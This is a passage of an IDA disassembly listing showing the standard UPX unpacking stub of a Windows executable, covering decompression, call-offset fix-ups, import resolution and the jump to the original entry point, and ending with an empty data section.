inc edi
loc_4067BE: ; CODE XREF: UPX1:00406856�j
; UPX1:0040686D�j
add ebx, ebx
jnz short loc_4067C9
loc_4067C2: ; CODE XREF: UPX1:004067B0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4067C9: ; CODE XREF: UPX1:004067C0�j
jb short loc_4067B8
mov eax, 1
loc_4067D0: ; CODE XREF: UPX1:004067DF�j
; UPX1:004067EA�j
add ebx, ebx
jnz short loc_4067DB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4067DB: ; CODE XREF: UPX1:004067D2�j
adc eax, eax
add ebx, ebx
jnb short loc_4067D0
jnz short loc_4067EC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4067D0
loc_4067EC: ; CODE XREF: UPX1:004067E1�j
xor ecx, ecx
sub eax, 3
jb short loc_406800
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_406872
mov ebp, eax
loc_406800: ; CODE XREF: UPX1:004067F1�j
add ebx, ebx
jnz short loc_40680B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40680B: ; CODE XREF: UPX1:00406802�j
adc ecx, ecx
add ebx, ebx
jnz short loc_406818
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406818: ; CODE XREF: UPX1:0040680F�j
adc ecx, ecx
jnz short loc_40683C
inc ecx
loc_40681D: ; CODE XREF: UPX1:0040682C�j
; UPX1:00406837�j
add ebx, ebx
jnz short loc_406828
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_406828: ; CODE XREF: UPX1:0040681F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40681D
jnz short loc_406839
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40681D
loc_406839: ; CODE XREF: UPX1:0040682E�j
add ecx, 2
loc_40683C: ; CODE XREF: UPX1:0040681A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40685C
loc_40684D: ; CODE XREF: UPX1:00406854�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40684D
jmp loc_4067BE
; ---------------------------------------------------------------------------
align 4
loc_40685C: ; CODE XREF: UPX1:0040684B�j
; UPX1:00406869�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40685C
add edi, ecx
jmp loc_4067BE
; ---------------------------------------------------------------------------
loc_406872: ; CODE XREF: UPX1:004067FC�j
pop esi
mov edi, esi
mov ecx, 1
loc_40687A: ; CODE XREF: UPX1:00406881�j
; UPX1:00406886�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40687F: ; CODE XREF: UPX1:004068A4�j
cmp al, 1
ja short loc_40687A
cmp byte ptr [edi], 1
jnz short loc_40687A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40687F
lea edi, [esi+4000h]
loc_4068AC: ; CODE XREF: UPX1:004068CE�j
mov eax, [edi]
or eax, eax
jz short loc_4068F7
mov ebx, [edi+4]
lea eax, [eax+esi+6240h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+627Ch]
xchg eax, ebp
loc_4068C9: ; CODE XREF: UPX1:004068EF�j
mov al, [edi]
inc edi
or al, al
jz short loc_4068AC
mov ecx, edi
jns short near ptr loc_4068DA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_4068DA: ; CODE XREF: UPX1:004068D2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6280h]
or eax, eax
jz short loc_4068F1
mov [ebx], eax
add ebx, 4
jmp short loc_4068C9
; ---------------------------------------------------------------------------
loc_4068F1: ; CODE XREF: UPX1:004068E8�j
call dword ptr [esi+6290h]
loc_4068F7: ; CODE XREF: UPX1:004068B0�j
mov ebp, [esi+6284h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1CFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_40692B: ; CODE XREF: UPX1:0040692F�j
push 0
cmp esp, eax
jnz short loc_40692B
sub esp, 0FFFFFF80h
jmp loc_401088
; ---------------------------------------------------------------------------
align 800h
UPX1 ends
; Section 4. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 408000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start